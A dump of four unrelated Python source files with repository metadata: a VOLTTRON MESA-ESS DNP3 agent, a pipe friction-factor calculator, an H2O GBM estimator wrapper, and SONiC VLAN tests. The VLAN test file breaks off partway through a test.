2022-03-29T21:44:36.000Z
|
services/core/DNP3Agent/dnp3/mesa/agent.py
|
gnmerritt/volttron
|
ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3
|
[
"Apache-2.0"
] | 219
|
2015-01-20T14:53:57.000Z
|
2022-03-06T00:37:41.000Z
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2018, 8minutenergy / Kisensum.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Neither 8minutenergy nor Kisensum, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by 8minutenergy or Kisensum.
# }}}
import logging
import sys
from volttron.platform.agent import utils
from volttron.platform.vip.agent import RPC
from dnp3.base_dnp3_agent import BaseDNP3Agent
from dnp3.points import DNP3Exception
from dnp3 import DEFAULT_LOCAL_IP, DEFAULT_PORT
from dnp3 import DEFAULT_POINT_TOPIC, DEFAULT_OUTSTATION_STATUS_TOPIC
from dnp3 import PUBLISH, PUBLISH_AND_RESPOND
from dnp3.mesa.functions import DEFAULT_FUNCTION_TOPIC, ACTION_PUBLISH_AND_RESPOND
from dnp3.mesa.functions import FunctionDefinitions, Function, FunctionException
# Agent version reported to the VOLTTRON platform.
__version__ = '1.1'

utils.setup_logging()
_log = logging.getLogger(__name__)
class MesaAgent(BaseDNP3Agent):
    """
    MesaAgent is a VOLTTRON agent that handles MESA-ESS DNP3 outstation communications.

    MesaAgent models a DNP3 outstation, communicating with a DNP3 master.

    For further information about this agent, MESA-ESS, and DNP3 communications, please
    see the VOLTTRON MESA-ESS agent specification, which can be found in VOLTTRON readthedocs
    at http://volttron.readthedocs.io/en/develop/specifications/mesa_agent.html.

    This agent can be installed from a command-line shell as follows:
        $ export VOLTTRON_ROOT=<volttron github install directory>
        $ cd $VOLTTRON_ROOT
        $ source services/core/DNP3Agent/install_mesa_agent.sh

    That file specifies a default agent configuration, which can be overridden as needed.
    """

    def __init__(self, functions=None, function_topic='', outstation_status_topic='',
                 all_functions_supported_by_default=False,
                 local_function_definitions_path=None, function_validation=False, **kwargs):
        """Initialize the MESA agent."""
        super(MesaAgent, self).__init__(**kwargs)
        self.functions = functions
        self.function_topic = function_topic
        self.outstation_status_topic = outstation_status_topic
        self.all_functions_supported_by_default = all_functions_supported_by_default
        self.function_validation = function_validation
        # Update default config
        self.default_config.update({
            'functions': functions,
            'function_topic': function_topic,
            'outstation_status_topic': outstation_status_topic,
            'all_functions_supported_by_default': all_functions_supported_by_default,
            'function_validation': function_validation
        })
        # Update default config in config store.
        self.vip.config.set_default('config', self.default_config)
        self.function_definitions = None
        self._local_function_definitions_path = local_function_definitions_path
        self._current_functions = dict()  # {function_id: Function}
        self._current_block = dict()  # {name: name, index: index}
        self._selector_block = dict()  # {selector_block_point_name: {selector_index: [Step]}}
        self._edit_selectors = list()  # [{name: name, index: index}]

    def _configure_parameters(self, contents):
        """
        Initialize/Update the MesaAgent configuration.

        See also the superclass version of this method, which does most of the initialization.

        MesaAgent configuration parameters:

            functions: (string) A JSON structure of function definitions to be loaded.

            function_topic: (string) Message bus topic to use when publishing MESA-ESS functions.
                    Default: mesa/function.

            all_functions_supported_by_default: (boolean) When deciding whether to reject points for unsupported
                    functions, ignore the values of their 'supported' points: simply treat all functions as
                    supported.
                    Default: False.
        """
        config = super(MesaAgent, self)._configure_parameters(contents)
        self.functions = config.get('functions', {})
        self.function_topic = config.get('function_topic', DEFAULT_FUNCTION_TOPIC)
        self.all_functions_supported_by_default = config.get('all_functions_supported_by_default', False)
        self.function_validation = config.get('function_validation', False)
        _log.debug('MesaAgent configuration parameters:')
        _log.debug('\tfunctions type={}'.format(type(self.functions)))
        _log.debug('\tfunction_topic={}'.format(self.function_topic))
        _log.debug('\tall_functions_supported_by_default={}'.format(bool(self.all_functions_supported_by_default)))
        _log.debug('\tfuntion_validation={}'.format(bool(self.function_validation)))
        self.load_function_definitions()
        self.supported_functions = []
        # Un-comment the next line to do more detailed validation and print definition statistics.
        # validate_definitions(self.point_definitions, self.function_definitions)

    def load_function_definitions(self):
        """Populate the FunctionDefinitions repository from JSON in the config store."""
        _log.debug('Loading MESA function definitions')
        try:
            self.function_definitions = FunctionDefinitions(self.point_definitions)
            self.function_definitions.load_functions(self.functions['functions'])
        except (AttributeError, TypeError) as err:
            # Fall back to a local definitions file if one was supplied.
            if self._local_function_definitions_path:
                _log.warning("Attempting to load Function Definitions from local path.")
                self.function_definitions = FunctionDefinitions(
                    self.point_definitions,
                    function_definitions_path=self._local_function_definitions_path)
            else:
                raise DNP3Exception("Failed to load Function Definitions from config store: {}".format(err))

    @RPC.export
    def reset(self):
        """Reset the agent's internal state, emptying point value caches. Used during iterative testing."""
        super(MesaAgent, self).reset()
        self._current_functions = dict()
        self._current_block = dict()
        self._selector_block = dict()
        self._edit_selectors = list()

    @RPC.export
    def get_selector_block(self, block_name, index):
        """Return the cached selector block at (block_name, index) as a
        {step_name: json} dict, or None when no data has been received."""
        try:
            return {step.definition.name: step.as_json() for step in self._selector_block[block_name][index]}
        except KeyError:
            _log.debug('Have not received data for Selector Block {} at Edit Selector {}'.format(block_name, index))
            return None

    def _process_point_value(self, point_value):
        """
        A PointValue was received from the Master. Process its payload.

        :param point_value: A PointValue.
        """
        try:
            point_val = super(MesaAgent, self)._process_point_value(point_value)
            if point_val:
                if point_val.point_def.is_selector_block:
                    self._current_block = {
                        'name': point_val.point_def.name,
                        'index': float(point_val.value)
                    }
                    _log.debug('Starting to receive Selector Block {name} at Edit Selector {index}'.format(
                        **self._current_block
                    ))
                # Publish mesa/point if the point action is PUBLISH or PUBLISH_AND_RESPOND
                if point_val.point_def.action in (PUBLISH, PUBLISH_AND_RESPOND):
                    self.publish_point_value(point_value)
                self.update_function_for_point_value(point_val)
                if self._current_functions:
                    # NOTE(review): pops entries from _current_functions while
                    # iterating items(); safe on Python 2, would need a
                    # list(...) copy on Python 3 — confirm target runtime.
                    for current_func_id, current_func in self._current_functions.items():
                        # if step action is ACTION_ECHO or ACTION_ECHO_AND_PUBLISH
                        if current_func.has_input_point():
                            self.update_input_point(
                                self.get_point_named(current_func.input_point_name()),
                                point_val.unwrapped_value()
                            )
                        # if step is the last curve or schedule step
                        if self._current_block and point_val.point_def == current_func.definition.last_step.point_def:
                            current_block_name = self._current_block['name']
                            self._selector_block.setdefault(current_block_name, dict())
                            self._selector_block[current_block_name][self._current_block['index']] = current_func.steps
                            _log.debug('Saved Selector Block {} at Edit Selector {}: {}'.format(
                                self._current_block['name'],
                                self._current_block['index'],
                                self.get_selector_block(self._current_block['name'], self._current_block['index'])
                            ))
                            self._current_block = dict()
                        # if step reference to a curve or schedule function
                        func_ref = current_func.last_step.definition.func_ref
                        if func_ref:
                            block_name = self.function_definitions[func_ref].first_step.name
                            block_index = float(point_val.value)
                            if not self._selector_block.get(block_name, dict()).get(block_index, None):
                                error_msg = 'Have not received data for Selector Block {} at Edit Selector {}'
                                raise DNP3Exception(error_msg.format(block_name, block_index))
                            current_edit_selector = {
                                'name': block_name,
                                'index': block_index
                            }
                            if current_edit_selector not in self._edit_selectors:
                                self._edit_selectors.append(current_edit_selector)
                        # if step action is ACTION_PUBLISH, ACTION_ECHO_AND_PUBLISH, or ACTION_PUBLISH_AND_RESPOND
                        if current_func.publish_now():
                            self.publish_function_step(current_func.last_step)
                        # if current function is completed
                        if current_func.complete:
                            self._current_functions.pop(current_func_id)
                            self._edit_selectors = list()
        except (DNP3Exception, FunctionException) as err:
            # Any failure aborts all in-progress functions.
            self._current_functions = dict()
            self._edit_selectors = list()
            if type(err) == DNP3Exception:
                raise DNP3Exception('Error processing point value: {}'.format(err))

    def update_function_for_point_value(self, point_value):
        """Add point_value to the current Function if appropriate."""
        error_msg = None
        current_functions = self.current_function_for(point_value.point_def)
        if not current_functions:
            return None
        # NOTE(review): pops entries while iterating items(); safe on
        # Python 2 only — confirm target runtime.
        for function_id, current_function in current_functions.items():
            try:
                if point_value.point_def.is_array_point:
                    self.update_array_for_point(point_value)
                current_function.add_point_value(point_value,
                                                 current_array=self._current_array,
                                                 function_validation=self.function_validation)
            except (DNP3Exception, FunctionException) as err:
                current_functions.pop(function_id)
                if type(err) == DNP3Exception:
                    error_msg = err
        # Only raise once every candidate function has rejected the point.
        if error_msg and not current_functions:
            raise DNP3Exception('Error updating function: {}'.format(error_msg))

    def current_function_for(self, new_point_def):
        """A point was received. Return the current Function, updating it if necessary."""
        new_point_function_def = self.function_definitions.get_fdef_for_pdef(new_point_def)
        if new_point_function_def is None:
            return None
        if self._current_functions:
            # Keep only in-progress functions that also match the new point.
            current_funcs = dict()
            for func_def in new_point_function_def:
                val = self._current_functions.pop(func_def.function_id, None)
                if val:
                    current_funcs.update({func_def.function_id: val})
            self._current_functions = current_funcs
        else:
            for func_def in new_point_function_def:
                if not self.all_functions_supported_by_default and not func_def.supported:
                    raise DNP3Exception('Received a point for unsupported {}'.format(func_def))
                self._current_functions[func_def.function_id] = Function(func_def)
        return self._current_functions

    def update_input_point(self, point_def, value):
        """
        Update an input point. This may send its PointValue to the Master.

        :param point_def: A PointDefinition.
        :param value: A value to send (unwrapped simple data type, or else a list/array).
        """
        super(MesaAgent, self).update_input_point(point_def, value)
        if type(value) != list:
            # Side-effect: If it's a Support point for a Function, update the Function's "supported" property.
            func = self.function_definitions.support_point_names().get(point_def.name, None)
            if func is not None and func.supported != value:
                _log.debug('Updating supported property to {} in {}'.format(value, func))
                func.supported = value

    def publish_function_step(self, step_to_send):
        """A Function Step was received from the DNP3 Master. Publish the Function."""
        function_to_send = step_to_send.function
        points = {step.definition.name: step.as_json() for step in function_to_send.steps}
        # Attach any cached selector-block data for the active edit selectors.
        for edit_selector in self._edit_selectors:
            block_name = edit_selector['name']
            index = edit_selector['index']
            try:
                points[block_name][index] = self.get_selector_block(block_name, index)
            except (KeyError, TypeError):
                points[block_name] = {
                    index: self.get_selector_block(block_name, index)
                }
        msg = {
            "function_id": function_to_send.definition.function_id,
            "function_name": function_to_send.definition.name,
            "points": points
        }
        if step_to_send.definition.action == ACTION_PUBLISH_AND_RESPOND:
            msg["expected_response"] = step_to_send.definition.response
        _log.info('Publishing MESA {} message {}'.format(function_to_send, msg))
        self.publish_data(self.function_topic, msg)
def mesa_agent(config_path, **kwargs):
    """
    Parse the MesaAgent configuration. Return an agent instance created from that config.

    :param config_path: (str) Path to a configuration file.

    :returns: (MesaAgent) The MESA agent
    """
    try:
        config = utils.load_config(config_path)
    except Exception:
        # Best-effort: fall back to an empty config (all defaults) when the
        # file is missing or unparseable.
        config = {}
    return MesaAgent(points=config.get('points', []),
                     functions=config.get('functions', []),
                     point_topic=config.get('point_topic', DEFAULT_POINT_TOPIC),
                     function_topic=config.get('function_topic', DEFAULT_FUNCTION_TOPIC),
                     outstation_status_topic=config.get('outstation_status_topic', DEFAULT_OUTSTATION_STATUS_TOPIC),
                     local_ip=config.get('local_ip', DEFAULT_LOCAL_IP),
                     port=config.get('port', DEFAULT_PORT),
                     outstation_config=config.get('outstation_config', {}),
                     all_functions_supported_by_default=config.get('all_functions_supported_by_default', False),
                     function_validation=config.get('function_validation', False),
                     **kwargs)
def main():
    """Main method called to start the agent via the VOLTTRON VIP loop."""
    utils.vip_main(mesa_agent, identity='mesaagent', version=__version__)
if __name__ == '__main__':
    # Entry point for script
    try:
        sys.exit(main())
    except KeyboardInterrupt:
        # Exit quietly on Ctrl-C.
        pass
| 49.412429
| 119
| 0.641665
|
4a0202127b085e8bb7120c42fe19074e81ce9949
| 2,936
|
py
|
Python
|
uniflocpy/uMultiphaseFlow/friction_Bratland.py
|
Shabonasar/unifloc
|
1f12d6b4110a9ff0e10817560ad99d55c9133954
|
[
"MIT"
] | null | null | null |
uniflocpy/uMultiphaseFlow/friction_Bratland.py
|
Shabonasar/unifloc
|
1f12d6b4110a9ff0e10817560ad99d55c9133954
|
[
"MIT"
] | null | null | null |
uniflocpy/uMultiphaseFlow/friction_Bratland.py
|
Shabonasar/unifloc
|
1f12d6b4110a9ff0e10817560ad99d55c9133954
|
[
"MIT"
] | null | null | null |
"""
Модуль для рассчета коэффициента трения
по данным книги:
Bratland O. Pipe flow 1: single-phase flow assurance
//Fonte: http://www.drbratland.com/download-two-free-books-on-flow-assurance. – 2009.
"""
import scipy.optimize as sp # модуль для решения уравения
import math
class Friction():
    """
    Friction-factor calculator after Ove Bratland,
    "Pipe flow 1: single-phase flow assurance" (2009).

    Computes the friction factor f from the Reynolds number,
    the absolute pipe roughness and the pipe inner diameter.
    """
    def __init__(self):
        """
        Constructor.

        Attributes (set later by calc_f):
        number_re -- dimensionless Reynolds number
        epsilon_m -- absolute roughness, m
        d_m -- pipe inner diameter, m
        """
        self.number_re = None
        self.absolute_roughness_m = None
        self.d_m = None
        self.relative_roughness = None # relative roughness (epsilon / d)
        self.f = None # resulting friction factor
        self.u_s = 1 # tuning parameter used to fit experimental data
    def __correlation__(self, f):
        """
        Core Ove Bratland correlation for the friction factor.
        When solved with fsolve, the current iterate is stored in self.f
        as a side effect (calc_f relies on this).
        :param f: friction factor iterate
        :return: difference between the recomputed f and the iterate, for fsolve
        """
        # NOTE(review): relies on Python 3 true division (1/2 == 0.5);
        # under Python 2 `f ** (1/2)` would degenerate to f ** 0 — confirm target runtime.
        self.f = f
        in_log10_part_first = ((1.547 / self.number_re / self.f ** (1/2))**(0.9445 * self.u_s))
        in_log10_part_second = ((self.absolute_roughness_m / 3.7 / self.d_m) ** self.u_s)
        result = (1 / ( - 2 / self.u_s * math.log10(in_log10_part_first + in_log10_part_second)))**2
        return result - self.f
    def calc_f(self, number_re, epsilon_m, d_m):
        """
        Compute the friction factor for the given flow regime.
        :param number_re: Reynolds number
        :param epsilon_m: absolute roughness, m
        :param d_m: pipe inner diameter, m
        :return: friction factor f
        """
        self.number_re = number_re
        self.absolute_roughness_m = epsilon_m
        self.d_m = d_m
        self.relative_roughness = self.absolute_roughness_m / self.d_m
        if self.number_re <= 2300: # Laminar
            self.f = 64 / self.number_re
        if 2300 < self.number_re <= 3100: # Turbulent
            p1 = 64 / 2300
            p2 = 0.04
            self.f = p1 + (p2 - p1) / (3100 - 2300) * (self.number_re - 2300) # TODO should be a straight line
        if 3100 < self.number_re <= 20000:
            # fsolve's return value is unused: __correlation__ stores the root in self.f
            mistake = sp.fsolve(self.__correlation__, 0.02) # TODO investigate the choice of initial guess
            p3 = float(self.f)
            p2 = 0.04
            self.f = p2 + (p3 - p2) / (20000 - 3100) * (self.number_re - 3100) # TODO should be a straight line
        if self.number_re > 20000:
            mistake = sp.fsolve(self.__correlation__, 0.02)
        self.f = float(self.f) # fsolve returns a numpy array; convert to float
        return self.f
| 38.631579
| 112
| 0.633174
|
4a02022d31dc93408706999271615cde7b5255e8
| 6,518
|
py
|
Python
|
h2o-py/h2o/estimators/gbm.py
|
Bhanuprakash-ch/h2o-3
|
c75bc5d2dc644cc8c09df755185a4cc6e34e0d1a
|
[
"Apache-2.0"
] | null | null | null |
h2o-py/h2o/estimators/gbm.py
|
Bhanuprakash-ch/h2o-3
|
c75bc5d2dc644cc8c09df755185a4cc6e34e0d1a
|
[
"Apache-2.0"
] | null | null | null |
h2o-py/h2o/estimators/gbm.py
|
Bhanuprakash-ch/h2o-3
|
c75bc5d2dc644cc8c09df755185a4cc6e34e0d1a
|
[
"Apache-2.0"
] | 1
|
2020-01-22T19:10:37.000Z
|
2020-01-22T19:10:37.000Z
|
from .estimator_base import *
class H2OGradientBoostingEstimator(H2OEstimator):
    """
    Builds gradient boosted classification trees, and gradient boosted regression trees on
    a parsed data set. The default distribution function will guess the model type based on
    the response column type. To run properly, the response column must be numeric for
    "gaussian" or an enum for "bernoulli" or "multinomial".

    Parameters
    ----------
    model_id : str, optional
      The unique id assigned to the resulting model. If none is given, an id will
      automatically be generated.
    distribution : str
      The distribution function of the response. Must be "AUTO", "bernoulli",
      "multinomial", "poisson", "gamma", "tweedie" or "gaussian"
    tweedie_power : float
      Tweedie power (only for Tweedie distribution, must be between 1 and 2)
    ntrees : int
      A non-negative integer that determines the number of trees to grow.
    max_depth : int
      Maximum depth to grow the tree.
    min_rows : int
      Minimum number of rows to assign to terminal nodes.
    learn_rate : float
      A value from 0.0 to 1.0
    nbins : int
      For numerical columns (real/int), build a histogram of (at least) this many bins, then
      split at the best point.
    nbins_top_level : int
      For numerical columns (real/int), build a histogram of (at most) this many bins at the
      root level, then decrease by factor of two per level.
    nbins_cats : int
      For categorical columns (factors), build a histogram of this many bins, then split at
      the best point. Higher values can lead to more overfitting.
    balance_classes : bool
      logical, indicates whether or not to balance training data class counts via
      over/under-sampling (for imbalanced data)
    max_after_balance_size : float
      Maximum relative size of the training data after balancing class counts
      (can be less than 1.0). Ignored if balance_classes is False, which is the
      default behavior.
    seed : int
      Seed for random numbers (affects sampling when balance_classes=T)
    build_tree_one_node : bool
      Run on one node only; no network overhead but fewer cpus used.
      Suitable for small datasets.
    nfolds : int, optional
      Number of folds for cross-validation. If nfolds >= 2, then validation must
      remain empty.
    fold_assignment : str
      Cross-validation fold assignment scheme, if fold_column is not specified.
      Must be "AUTO", "Random" or "Modulo"
    keep_cross_validation_predictions : bool
      Whether to keep the predictions of the cross-validation models
    score_each_iteration : bool
      Attempts to score each tree.

    Returns
    -------
      A new H2OGradientBoostedEstimator object.
    """

    def __init__(self, model_id=None, distribution=None, tweedie_power=None, ntrees=None,
                 max_depth=None, min_rows=None, learn_rate=None, nbins=None,
                 nbins_top_level=None, nbins_cats=None, balance_classes=None,
                 max_after_balance_size=None, seed=None, build_tree_one_node=None,
                 nfolds=None, fold_assignment=None, keep_cross_validation_predictions=None,
                 score_each_iteration=None, checkpoint=None):
        super(H2OGradientBoostingEstimator, self).__init__()
        # Snapshot all constructor arguments into the backend parameter dict.
        # Use .items() (not the Python-2-only .iteritems()) so the class works
        # on both Python 2 and Python 3.
        parms = locals()
        self._parms = {k: v for k, v in parms.items() if k != "self"}

    # Each property below is a simple pass-through accessor for one entry in
    # the backend parameter dict self._parms.

    @property
    def distribution(self):
        return self._parms["distribution"]

    @distribution.setter
    def distribution(self, value):
        self._parms["distribution"] = value

    @property
    def tweedie_power(self):
        return self._parms["tweedie_power"]

    @tweedie_power.setter
    def tweedie_power(self, value):
        self._parms["tweedie_power"] = value

    @property
    def ntrees(self):
        return self._parms["ntrees"]

    @ntrees.setter
    def ntrees(self, value):
        self._parms["ntrees"] = value

    @property
    def max_depth(self):
        return self._parms["max_depth"]

    @max_depth.setter
    def max_depth(self, value):
        self._parms["max_depth"] = value

    @property
    def min_rows(self):
        return self._parms["min_rows"]

    @min_rows.setter
    def min_rows(self, value):
        self._parms["min_rows"] = value

    @property
    def learn_rate(self):
        return self._parms["learn_rate"]

    @learn_rate.setter
    def learn_rate(self, value):
        self._parms["learn_rate"] = value

    @property
    def nbins(self):
        return self._parms["nbins"]

    @nbins.setter
    def nbins(self, value):
        self._parms["nbins"] = value

    @property
    def nbins_top_level(self):
        return self._parms["nbins_top_level"]

    @nbins_top_level.setter
    def nbins_top_level(self, value):
        self._parms["nbins_top_level"] = value

    @property
    def nbins_cats(self):
        return self._parms["nbins_cats"]

    @nbins_cats.setter
    def nbins_cats(self, value):
        self._parms["nbins_cats"] = value

    @property
    def balance_classes(self):
        return self._parms["balance_classes"]

    @balance_classes.setter
    def balance_classes(self, value):
        self._parms["balance_classes"] = value

    @property
    def max_after_balance_size(self):
        return self._parms["max_after_balance_size"]

    @max_after_balance_size.setter
    def max_after_balance_size(self, value):
        self._parms["max_after_balance_size"] = value

    @property
    def seed(self):
        return self._parms["seed"]

    @seed.setter
    def seed(self, value):
        self._parms["seed"] = value

    @property
    def build_tree_one_node(self):
        return self._parms["build_tree_one_node"]

    @build_tree_one_node.setter
    def build_tree_one_node(self, value):
        self._parms["build_tree_one_node"] = value

    @property
    def nfolds(self):
        return self._parms["nfolds"]

    @nfolds.setter
    def nfolds(self, value):
        self._parms["nfolds"] = value

    @property
    def fold_assignment(self):
        return self._parms["fold_assignment"]

    @fold_assignment.setter
    def fold_assignment(self, value):
        self._parms["fold_assignment"] = value

    @property
    def keep_cross_validation_predictions(self):
        return self._parms["keep_cross_validation_predictions"]

    @keep_cross_validation_predictions.setter
    def keep_cross_validation_predictions(self, value):
        self._parms["keep_cross_validation_predictions"] = value

    @property
    def score_each_iteration(self):
        return self._parms["score_each_iteration"]

    @score_each_iteration.setter
    def score_each_iteration(self, value):
        self._parms["score_each_iteration"] = value

    @property
    def checkpoint(self):
        return self._parms["checkpoint"]

    @checkpoint.setter
    def checkpoint(self, value):
        self._parms["checkpoint"] = value
| 29.762557
| 90
| 0.722001
|
4a0202dd624cac1885a6578b14d9ed0e64291f49
| 30,957
|
py
|
Python
|
tests/test_vlan.py
|
akokhan/sonic-swss
|
c7d8c2b77171b0dcbbb962306697601d0c2b73fa
|
[
"Apache-2.0"
] | null | null | null |
tests/test_vlan.py
|
akokhan/sonic-swss
|
c7d8c2b77171b0dcbbb962306697601d0c2b73fa
|
[
"Apache-2.0"
] | 1
|
2021-11-30T01:19:59.000Z
|
2021-11-30T01:19:59.000Z
|
tests/test_vlan.py
|
akokhan/sonic-swss
|
c7d8c2b77171b0dcbbb962306697601d0c2b73fa
|
[
"Apache-2.0"
] | 2
|
2019-07-16T03:36:44.000Z
|
2019-07-17T02:15:37.000Z
|
from swsscommon import swsscommon
import time
import re
import json
import pytest
import platform
from distutils.version import StrictVersion
class TestVlan(object):
def setup_db(self, dvs):
self.pdb = swsscommon.DBConnector(0, dvs.redis_sock, 0)
self.adb = swsscommon.DBConnector(1, dvs.redis_sock, 0)
self.cdb = swsscommon.DBConnector(4, dvs.redis_sock, 0)
self.sdb = swsscommon.DBConnector(6, dvs.redis_sock, 0)
def create_vlan(self, vlan):
tbl = swsscommon.Table(self.cdb, "VLAN")
fvs = swsscommon.FieldValuePairs([("vlanid", vlan)])
tbl.set("Vlan" + vlan, fvs)
time.sleep(1)
def remove_vlan(self, vlan):
tbl = swsscommon.Table(self.cdb, "VLAN")
tbl._del("Vlan" + vlan)
time.sleep(1)
def create_vlan_member(self, vlan, interface, tagging_mode="untagged"):
tbl = swsscommon.Table(self.cdb, "VLAN_MEMBER")
fvs = swsscommon.FieldValuePairs([("tagging_mode", tagging_mode)])
tbl.set("Vlan" + vlan + "|" + interface, fvs)
time.sleep(1)
def remove_vlan_member(self, vlan, interface):
tbl = swsscommon.Table(self.cdb, "VLAN_MEMBER")
tbl._del("Vlan" + vlan + "|" + interface)
time.sleep(1)
def create_port_channel(self, dvs, channel, admin_status="up", mtu="1500"):
tbl = swsscommon.ProducerStateTable(self.pdb, "LAG_TABLE")
fvs = swsscommon.FieldValuePairs([("admin", admin_status), ("mtu", mtu)])
tbl.set("PortChannel" + channel, fvs)
dvs.runcmd("ip link add PortChannel" + channel + " type bond")
tbl = swsscommon.Table(self.sdb, "LAG_TABLE")
fvs = swsscommon.FieldValuePairs([("state", "ok")])
tbl.set("PortChannel" + channel, fvs)
time.sleep(1)
def remove_port_channel(self, dvs, channel):
tbl = swsscommon.ProducerStateTable(self.pdb, "LAG_TABLE")
tbl._del("PortChannel" + channel)
dvs.runcmd("ip link del PortChannel" + channel)
tbl = swsscommon.Table(self.sdb, "LAG_TABLE")
tbl._del("PortChannel" + channel)
time.sleep(1)
def create_port_channel_member(self, channel, interface, status="enabled"):
tbl = swsscommon.ProducerStateTable(self.pdb, "LAG_MEMBER_TABLE")
fvs = swsscommon.FieldValuePairs([("status", status)])
tbl.set("PortChannel" + channel + ":" + interface, fvs)
time.sleep(1)
def remove_port_channel_member(self, channel, interface):
tbl = swsscommon.ProducerStateTable(self.pdb, "LAG_MEMBER_TABLE")
tbl._del("PortChannel" + channel + ":" + interface)
time.sleep(1)
    def check_syslog(self, dvs, marker, process, err_log, vlan_str, expected_cnt):
        """Assert that exactly *expected_cnt* syslog lines after *marker* come from
        *process* and match both *err_log* and (case-insensitively) *vlan_str*.
        The count is computed by an awk/grep pipeline run inside the DVS container.
        """
        (exitcode, num) = dvs.runcmd(['sh', '-c', "awk \'/%s/,ENDFILE {print;}\' /var/log/syslog | grep %s | grep \"%s\" | grep -i \"%s\" | wc -l" % (marker, process, err_log, vlan_str)])
        assert num.strip() == str(expected_cnt)
def check_app_db_vlan_fields(self, fvs, admin_status="up", mtu="9100"):
for fv in fvs:
if fv[0] == "admin_status":
assert fv[1] == admin_status
elif fv[0] == "mtu":
assert fv[1] == mtu
def check_app_db_vlan_member_fields(self, fvs, tagging_mode="untagged"):
for fv in fvs:
if fv[0] == "tagging_mode":
assert fv[1] == tagging_mode
def check_state_db_vlan_fields(self, fvs, state="ok"):
for fv in fvs:
if fv[0] == "state":
assert fv[1] == state
def check_state_db_vlan_member_fields(self, fvs, state="ok"):
for fv in fvs:
if fv[0] == "state":
assert fv[1] == state
    def test_VlanAddRemove(self, dvs, testlog):
        """Create one VLAN with one untagged member and verify ASIC_DB state:
        the VLAN entry, the VLAN member attributes, the port PVID and the
        host-interface VLAN tag mode; then remove everything.
        """
        dvs.setup_db()
        # create vlan
        dvs.create_vlan("2")
        # check asic database
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
        vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
        assert len(vlan_entries) == 1
        vlan_oid = vlan_entries[0]
        (status, fvs) = tbl.get(vlan_oid)
        assert status == True
        for fv in fvs:
            if fv[0] == "SAI_VLAN_ATTR_VLAN_ID":
                assert fv[1] == "2"
        # create vlan member
        dvs.create_vlan_member("2", "Ethernet0")
        # check asic database
        # map bridge-port OID -> underlying port OID so member entries can be resolved
        bridge_port_map = {}
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_BRIDGE_PORT")
        bridge_port_entries = tbl.getKeys()
        for key in bridge_port_entries:
            (status, fvs) = tbl.get(key)
            assert status == True
            for fv in fvs:
                if fv[0] == "SAI_BRIDGE_PORT_ATTR_PORT_ID":
                    bridge_port_map[key] = fv[1]
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
        vlan_member_entries = tbl.getKeys()
        assert len(vlan_member_entries) == 1
        (status, fvs) = tbl.get(vlan_member_entries[0])
        assert status == True
        assert len(fvs) == 3
        for fv in fvs:
            if fv[0] == "SAI_VLAN_MEMBER_ATTR_VLAN_TAGGING_MODE":
                assert fv[1] == "SAI_VLAN_TAGGING_MODE_UNTAGGED"
            elif fv[0] == "SAI_VLAN_MEMBER_ATTR_VLAN_ID":
                assert fv[1] == vlan_oid
            elif fv[0] == "SAI_VLAN_MEMBER_ATTR_BRIDGE_PORT_ID":
                assert dvs.asicdb.portoidmap[bridge_port_map[fv[1]]] == "Ethernet0"
            else:
                assert False
        # check port pvid
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_PORT")
        (status, fvs) = tbl.get(dvs.asicdb.portnamemap["Ethernet0"])
        assert status == True
        assert "SAI_PORT_ATTR_PORT_VLAN_ID" in [fv[0] for fv in fvs]
        for fv in fvs:
            if fv[0] == "SAI_PORT_ATTR_PORT_VLAN_ID":
                assert fv[1] == "2"
        # check host interface vlan tag
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_HOSTIF")
        (status, fvs) = tbl.get(dvs.asicdb.hostifnamemap["Ethernet0"])
        assert status == True
        assert "SAI_HOSTIF_ATTR_VLAN_TAG" in [fv[0] for fv in fvs]
        for fv in fvs:
            if fv[0] == "SAI_HOSTIF_ATTR_VLAN_TAG":
                assert fv[1] == "SAI_HOSTIF_VLAN_TAG_KEEP"
        # remove vlan member
        dvs.remove_vlan_member("2", "Ethernet0")
        # remove vlan
        dvs.remove_vlan("2")
def test_MultipleVlan(self, dvs, testlog):
return
dvs.setup_db()
# create vlan and vlan members
dvs.create_vlan("18")
dvs.create_vlan_member("18", "Ethernet0")
dvs.create_vlan_member("18", "Ethernet4")
dvs.create_vlan_member("18", "Ethernet8")
# check asic database
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 1
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 3
# remove vlan members
dvs.remove_vlan_member("18", "Ethernet0")
dvs.remove_vlan_member("18", "Ethernet4")
dvs.remove_vlan_member("18", "Ethernet8")
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 0
# create vlan and vlan members
dvs.create_vlan("188")
dvs.create_vlan_member("188", "Ethernet20")
dvs.create_vlan_member("188", "Ethernet24")
dvs.create_vlan_member("188", "Ethernet28")
# check asic database
